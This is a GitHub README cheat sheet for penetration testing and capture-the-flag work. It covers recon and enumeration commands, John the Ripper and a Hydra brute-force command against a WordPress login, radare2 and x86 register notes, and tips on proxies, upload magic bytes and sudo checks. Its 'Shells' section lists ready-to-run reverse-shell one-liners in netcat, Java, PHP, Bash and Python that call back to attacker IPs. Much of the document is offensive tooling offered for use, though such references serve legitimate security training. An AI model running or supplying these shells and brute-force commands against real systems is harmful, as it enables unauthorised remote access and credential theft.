Skip to content

This is a simple Cheat Sheet which can be helpful while pentesting

Notifications You must be signed in to change notification settings

DennisFeldbusch/CheatSheet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

56 Commits
 
 

Repository files navigation

CheatSheet

Planned ToDo's

  • write scripts for automating the repetitive tasks like:

    1. look for domain of the company
    2. look for subdomains of the domain
    3. look for dns entries
    4. use Google Hacking for deeper recon
    5. generate a detailed report of all findings
    6. ...
  • create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker)

Useful Guides and Links

For Pentesting/BugBounty-Hunting there is a very detailed map and guide of how to proceed.

Very useful BugBounty CheatSheet from EdOverflow

Bug Bounty Writeups for learning

Local Webserver

Python

python -m SimpleHTTPServer
python3 -m http.server

PHP

php -S 0.0.0.0:8000

Ruby

ruby -run -e httpd . -p 8000

Useful Tools

scans networks

nmap -sC -sV -oA nmap/openadmin 10.10.10.171
  • -sC = scans with the standard scripts
  • -sV = scans the versions

bruteforce websites to find directories and/or files

gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist

scans a target for wordpress related stuff

## basic scan
wpscan --url 10.10.10.10

## advanced scan with plugin detection
wpscan —url 10.10.10.10 —enumerate p,u —plugins-detection aggressive

creates wordlist from website

cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10

enumerates Windows and Samba systems

Ports to look for: 445, 139

enum4linux -U -o 10.10.10.10

finding specific filetypes in domain

goofile -d kali.org -f pdf
searchsploit tomcat

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

Command Description
john –wordlist=/usr/share/wordlists/rockyou.txt hash JTR password cracking
john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt JTR forced descrypt cracking with wordlist
john –format=descrypt hash –show JTR forced descrypt brute force cracking
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30

Tool to read and modify the metadata of files.

read metadata

exiftool <file>

write metadata

exiftool -artist=me <file>

radare2 is a tool for reverse-engineering

# start radare2
radare2 file

# analyze all
aa 

# list all functions 
afl

# set selection to main function
s main 

# disassemble
pdf 

# show graph
VV

wfuzz is a web fuzzing tool

example of finding vhosts

wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>

Reverse Engineering

Get strings from binary

strings binaryFile

Get hexdump from binary

hexdump --canonical binaryFile

Get assembly

objdump -D -M x86-64 binaryFile

Use radare2 to reverse engineer binary

x86 registers

  ================ rax (64 bits)
          ======== eax (32 bits)
              ====  ax (16 bits)
              ==    ah (8 bits)
                ==  al (8 bits)

register purposes

Register Purpose Saved across calls
RAX temp register; return value no
RBX callee-saved yes
RCX used to pass 4th argument to functions no
RDX used to pass 3rd argument to functions no
RSP stack pointer yes
RBP callee-saved; base pointer yes
RSI used to pass 2nd argument to functions no
RDI used to pass 1st argument to functions no
R8 used to pass 5th argument to functions no
R9 used to pass 6th argument to functions no
R10-11 temporary no
R12-15 callee-saved registers yes

RISC (ARM) instruction set

MOV DESTINATION, SOURCE

Stack

Stackpointer

  • points to the next item on the stack
  • grows downwards

Base pointer

  • unchanged point in memory where the stack starts
memory:                  CPU:

0x0000                  ________ 
|    | <--------------  |  SP  |
|    |        |-------  |  BP  |
|    |        |         |  IP  |
|    | <------|         |  ..  |
|    |                  |  ..  |
|    |                  |  ..  |
0xFFFF                  |______|

Shells

Set Listener

nc -lnvp 4000

netcat

nc -e /bin/sh 10.10.15.22 4000

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP

php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Bash

bash -i >& /dev/tcp/10.10.15.22/4000 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Interactive Shell

  • can be executed with python or python3

Bash

python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg

Zsh

python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg

Usefuls Scripts

HEX Converter

Ascii to Hex

#!/bin/bash
echo $1 | tr -d "\n" | hexdump -v -e '16/1 "%02x " "\n"'

Hex to Ascii

#!/bin/bash
echo $1 | xxd -r -p

Hide yourself

Interesting Stack Exchange link

A Proxy is an instance between both communication partners. If you send a request to a server the proxy intercepts it and is forwarding this request to the server but is behaving like itself send the request so the server don't know about me. And the exact way back.

A Proxy Chain are multile Proxy Servers chained together so it is way more difficult to get to know the initial sender(client)

Here is a nice graphic on who sees what in Tor and HTTPS cases.

File Uploads

Use

Magic Numbers

  • these magic numbers at the start of a file define the type of file
BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38

Priviledge Escalation

  • find programms which can be executed as sudo without password
sudo -l
  • find files that belong to root but can be read by (anyone) because of groups